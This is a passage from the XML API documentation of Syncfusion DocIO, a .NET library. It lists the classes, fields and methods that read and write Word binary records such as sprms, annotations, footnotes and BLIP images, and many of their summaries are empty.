        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmOperandSize.FourBytes">
            <summary>
             Size of the operand, 4 bytes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmOperandSize.TwoBytes2">
            <summary>
             Size of the operand, TwoBytes2.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmOperandSize.TwoBytes3">
            <summary>
             Size of the operand, TwoBytes3.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmOperandSize.Variable">
            <summary>
            Variable length - following byte is size of operand.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmOperandSize.ThreeBytes">
            <summary>
             Size of the operand, 3 bytes.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmOptionType">
            <summary>
            Specifies the WordSprmOptionType.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmOptionType.sprmSNfcFtnRef">
            Footnote/Endnotes Sprms
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmOptionType.sprmCUndocumentedSpacing">
            <summary>
            newly added
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordComplexBlockType">
            <summary>
            Specifies word complex block type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordComplexBlockType.Sprms">
            <summary>
            Specifies Type as Sprms.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordComplexBlockType.PieceTable">
            <summary>
            Specifies Type as PieceTable.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordStyleType">
            <summary>
            Style type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordStyleType.ParagraphStyle">
            <summary>
            Specifies Paragraph style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordStyleType.CharacterStyle">
            <summary>
            Specifies character style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordStyleType.TableStyle">
            <summary>
            Specifies Table style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordStyleType.ListStyle">
            <summary>
            Specifies List style.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphJustify">
            <summary>
            Paragraph justification code.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphJustify.Left">
            <summary>
            Left justification.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphJustify.Center">
            <summary>
            Center justification.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphJustify.Right">
            <summary>
            Right justification.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphJustify.LeftAndRight">
            <summary>
            LeftAndRight justification.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmOptions">
            <summary>
            Word Sprm Options.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmOptions.sprmSNfcFtnRef">
            Footnote/Endnotes Sprms
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmOptions.sprmCUndocumentedSpacing">
            <summary>
            newly added
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.AnnotationsRW">
            <summary>
            Summary description for annotations.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.SubDocumentRW">
            <summary>
            Summary description for SubDocumentRW.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.m_fib">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.m_txtPositions">
            <summary>
            Text position table.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.m_refPositions">
            <summary>
            Referense position table.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.m_descriptorsAnnot">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.m_descrFootEndntes">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.m_reader">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.m_writer">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.m_endRefPosition">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.m_iCount">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.m_iInitialDesctiptorNumber">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.m_autoCount">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.m_endReference">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.m_footEndnoteRefIndex">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.#ctor(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.SubDocumentRW"/> class.
            </summary>
            <param name="stream">The stream.</param>
            <param name="fib">The fib.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.SubDocumentRW"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.HasReference(System.Int32)">
            <summary>
            Determines whether the specified reference has reference.
            </summary>
            <param name="reference">The reference.</param>
            <returns>
            	<c>true</c> if the specified reference has reference; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.HasReference(System.Int32,System.Int32,System.Int32@)">
            <summary>
            Determines whether the required reference position is in between the given start and end position
            </summary>
            <param name="startPosition">Start position</param>
            <param name="endPosition">End position</param>
            <param name="textLength">Text length</param>
            <returns><c>True</c> if the Reference position of next Foonote/Endnote in between the start and end position otherwise <c>false</c> </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.HasPosition(System.Int32)">
            <summary>
            Determines whether the specified position has position.
            </summary>
            <param name="position">The position.</param>
            <returns>
            <c>true</c> if the specified position has position; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.Read(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            Reads.
            </summary>
            <param name="stream">The stream.</param>
            <param name="fib">The fib.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.Write(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            Writes.
            </summary>
            <param name="stream">The stream.</param>
            <param name="fib">The fib.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.AddTxtPosition(System.Int32)">
            <summary>
            Adds the text position.
            </summary>
            <param name="position">The position.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.GetTxtPosition(System.Int32)">
            <summary>
            Gets the text position.
            </summary>
            <param name="index">The index.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.ReadDescriptors">
            <summary>
            Reads the descriptors.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.WriteDescriptors">
            <summary>
            Writes the descriptors.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.ReadDescriptors(System.Int32,System.Int32)">
            <summary>
            Reads the descriptors.
            </summary>
            <param name="length">The length.</param>
            <param name="size">The size.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.AddRefPosition(System.Int32)">
            <summary>
            Adds the reference position.
            </summary>
            <param name="position">The position.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.Init">
            <summary>
            Inits this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.ReadTxtPositions">
            <summary>
            Reads the text positions.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.ReadTxtPositions(System.Int32)">
            <summary>
            Reads the text positions.
            </summary>
            <param name="count">The count.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.WriteTxtPositionsBase">
            <summary>
            Writes the text positions base.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.WriteTxtPositions">
            <summary>
            Writes the text positions.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.WriteRefPositions(System.Int32)">
            <summary>
            Writes the reference positions.
            </summary>
            <param name="endPos">The end pos.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.ReadDescriptor(System.IO.BinaryReader,System.Int32,System.Int32)">
            <summary>
            Reads the descriptor.
            </summary>
            <param name="reader">The reader.</param>
            <param name="pos">The pos.</param>
            <param name="posNext">The pos next.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.SubDocumentRW.Count">
            <summary>
            Gets the count.
            </summary>
            <value>The count.</value>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.m_grpXstAtnOwners">
            <summary>
            Annotation owners.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.#ctor(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.AnnotationsRW"/> class.
            </summary>
            <param name="stream"></param>
            <param name="fib"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.AnnotationsRW"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.Read(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            Reads.
            </summary>
            <param name="stream">The stream.</param>
            <param name="fib">The fib.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.Write(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            Writes.
            </summary>
            <param name="stream">The stream.</param>
            <param name="fib">The fib.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AddDescriptor(Syncfusion.DocIO.ReaderWriter.Biff_Records.AnnotationDescriptor,System.Int32,System.Int32,System.Int32)">
            <summary>
            Adds the descriptor.
            </summary>
            <param name="atrd">The annotation descriptor.</param>
            <param name="pos">The pos.</param>
            <param name="bkmkStart">The bookmark start.</param>
            <param name="bkmkEnd">The bookmark end.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AddDescriptor(Syncfusion.DocIO.ReaderWriter.Biff_Records.AnnotationDescriptor,System.Int32)">
            <summary>
            Adds the descriptor.
            </summary>
            <param name="atrd">The annotation descriptor.</param>
            <param name="pos">The pos.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AddGXAO(System.String)">
            <summary>
            Adds the GXAO.
            </summary>
            <param name="gxao">The gxao.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.GetDescriptor(System.Int32)">
            <summary>
            Gets the descriptor.
            </summary>
            <param name="index">The index.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.GetUser(System.Int32)">
            <summary>
            Gets the user.
            </summary>
            <param name="index">Index of the atn.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.GetBookmarkStartOffset(System.Int32)">
            <summary>
            Gets the bookmark start.
            </summary>
            <param name="index">The index.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.GetBookmarkEndOffset(System.Int32)">
            <summary>
            Gets the bookmark end.
            </summary>
            <param name="index">The index.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.GetPosition(System.Int32)">
            <summary>
            Gets the position.
            </summary>
            <param name="index">The index.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.ReadGXAO(System.Int32,System.Int32)">
            <summary>
            Reads the GXAO.
            </summary>
            <param name="pos">The pos.</param>
            <param name="length">The length.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.WriteGXAO">
            <summary>
            Writes the GXAO.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.Init">
            <summary>
            Inits this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.ReadTxtPositions">
            <summary>
            Reads the text positions.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.ReadDescriptors">
            <summary>
            Reads the descriptors.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.ReadDescriptor(System.IO.BinaryReader,System.Int32,System.Int32)">
            <summary>
            Reads the descriptor.
            </summary>
            <param name="reader">The reader.</param>
            <param name="pos">The position.</param>
            <param name="posNext">The next positiopn.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.WriteDescriptors">
            <summary>
            Writes the descriptors.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.WriteTxtPositions">
            <summary>
            Writes the text positions.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmark">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmark.#ctor(System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="start"></param>
            <param name="end"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmark.Start">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmark.End">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmarks">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmarks.#ctor(System.IO.BinaryReader,Syncfusion.DocIO.ReaderWriter.Fib)">
             <summary>
            
             </summary>
             <param name="reader"></param>
             <param name="fib"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmarks.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmarks.Read(System.IO.BinaryReader,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="fib"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmarks.Add(System.Int32,Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmark)">
            <summary>
            
            </summary>
            <param name="key"></param>
            <param name="bookmark"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmarks.Write(System.IO.BinaryWriter,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            
            </summary>
            <param name="writer"></param>
            <param name="fib"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmarks.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmarks.ReadSttbf(System.IO.BinaryReader,System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="start"></param>
            <param name="length"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmarks.WriteSttbf(System.IO.BinaryWriter,System.Int32[])">
            <summary>
            
            </summary>
            <param name="writer"></param>
            <param name="values"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmarks.WriteBKF(System.IO.BinaryWriter,System.Int32[],System.Int32[],System.Int32)">
            <summary>
            
            </summary>
            <param name="writer"></param>
            <param name="keys"></param>
            <param name="values"></param>
            <param name="end"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmarks.WriteBKL(System.IO.BinaryWriter,System.Int32)">
            <summary>
            
            </summary>
            <param name="writer"></param>
            <param name="end"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmarks.Item(System.Int32)">
            <summary>
            
            </summary>
            <param name="key"></param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmarks.Comparer">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AnnotationsRW.AnnotationBookmarks.Comparer.Compare(System.Object,System.Object)">
            <summary>
            
            </summary>
            <param name="x"></param>
            <param name="y"></param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.BaseProps">
            <summary>
            Summary description for BaseProps.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress">
            <summary>
            Summary description for FileShapeAddress.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.m_spid">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.#ctor(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.Read(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.Spid">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.XaLeft">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.YaTop">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.XaRight">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.YaBottom">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.IsHeaderShape">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.RelHrzPos">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.RelVrtPos">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.TextWrappingStyle">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.TextWrappingType">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.IsRcaSimple">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.IsBelowText">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.IsAnchorLock">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.TxbxCount">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.Height">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress.Width">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.BaseProps.m_horAlignment">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.BaseProps.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.BaseProps.HorizontalAlignment">
            <summary>
            Gets / sets shape horizontal alignment.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.BaseProps.VerticalAlignment">
            <summary>
            Gets / sets shape vertical alignment.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Escher.BitmapBLIP">
            <summary>
            Summary description for BitmapBLIP.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Escher.Blip">
            <summary>
            Summary description for Blip.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.Blip.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.Blip.Read(System.IO.Stream,System.Int32,System.Boolean)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="length"></param>
            <param name="chr"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.Blip.Write(System.IO.Stream,System.IO.MemoryStream,Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipType,System.Byte[])">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="image"></param>
            <param name="imageFormat"></param>
            <param name="id"></param>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.BitmapBLIP.m_rgbUid">
            <summary>
            The secondary, or data, UID - should always be set
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.BitmapBLIP.m_rgbUidPrimary">
            <summary>
            optional based on the above check
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.BitmapBLIP.m_tag">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.BitmapBLIP.m_pvImageBytes">
            <summary>
            raster bits of the blip
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.BitmapBLIP.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.BitmapBLIP.Read(System.IO.Stream,System.Int32,System.Boolean)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="length"></param>
            <param name="hasPrimaryUid"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.BitmapBLIP.Write(System.IO.Stream,System.IO.MemoryStream,Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipType,System.Byte[])">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="image"></param>
            <param name="imageFormat"></param>
            <param name="id"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.BitmapBLIP.WriteDefaults(System.IO.Stream,System.Int64,Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipType,System.Byte[])">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="size"></param>
            <param name="type"></param>
            <param name="id"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.BitmapBLIP.Close">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.BitmapBLIP.RgbUid">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.BitmapBLIP.RgbUidPrimary">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.BitmapBLIP.Tag">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.BitmapBLIP.ImageBytes">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Escher.BstoreContainer">
            <summary>
            Summary description for BstoreContainer.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.BstoreContainer.m_fbse">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.BstoreContainer.m_bitmapBlip">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.BstoreContainer.m_bitmap">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.BstoreContainer.m_blip">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.BstoreContainer.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.BstoreContainer.Read(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.BstoreContainer.Write(System.IO.Stream,System.IO.MemoryStream,System.Byte[],System.Drawing.Image)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="imageStream"></param>
            <param name="id"></param>
            <param name="image"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.BstoreContainer.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.BstoreContainer.Fbse">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.BstoreContainer.Bitmap">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.EndnotesRW">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.FootnotesRW">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.FootnotesRW.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.FootnotesRW.#ctor(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="fib"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.FootnotesRW.AddReferense(System.Int32,System.Boolean)">
            <summary>
            
            </summary>
            <param name="pos"></param>
            <param name="autoNumbered"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.FootnotesRW.GetDescriptor(System.Int32)">
            <summary>
            
            </summary>
            <param name="index"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.FootnotesRW.WriteTxtPositions">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.FootnotesRW.WriteDescriptors">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.FootnotesRW.ReadTxtPositions">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.FootnotesRW.ReadDescriptors">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.FootnotesRW.ReadDescriptor(System.IO.BinaryReader,System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="pos"></param>
            <param name="posNext"></param>
        </member>
